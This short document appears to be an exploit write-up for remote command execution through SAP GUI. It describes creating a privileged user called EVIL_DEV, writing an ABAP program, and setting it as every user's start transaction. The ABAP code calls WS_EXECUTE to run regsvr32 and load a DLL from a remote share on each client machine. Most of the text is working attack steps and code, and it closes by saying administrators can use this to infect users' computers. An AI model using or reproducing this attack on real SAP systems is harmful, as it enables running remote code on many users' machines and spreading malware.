Simple remote command execution exploit code for SAP GUI First of all need to create a malicious ABAP program on SAP NetWeaver AS ABAP
-
First of all, to get RCE on a client’s computer, it is necessary to create a user with developer rights. The user SAP* cannot create or change any programs. To do this, run transaction su01 and create a new user with SAP_ALL rights under login EVIL_DEV.
-
Then, login as the EVIL_DEV user, run transaction se38 and create a program sap_malware_prog.
-
Then when we are able to create a program, we click the Insert button, then copy a program, which executes malicious functionality, then save all and activate the program.
-
The screenshot shows that we set start transaction – mlauncher for all users.
CALL FUNCTION 'WS_EXECUTE'
EXPORTING
program = 'c:\Windows\System32\regsvr32.exe'
commandline = '/i /s \\REMOTE_FOLDER\tmp\evil.dll'
INFORM = ''
EXCEPTIONS
FRONTEND_ERROR = 1
NO_BATCH = 2
PROG_NOT_FOUND = 3
ILLEGAL_OPTION = 4
GUI_REFUSE_EXECUTE = 5
OTHERS = 6.
using this vulnerability developers or sap administrator can execute any command on users computers and infected them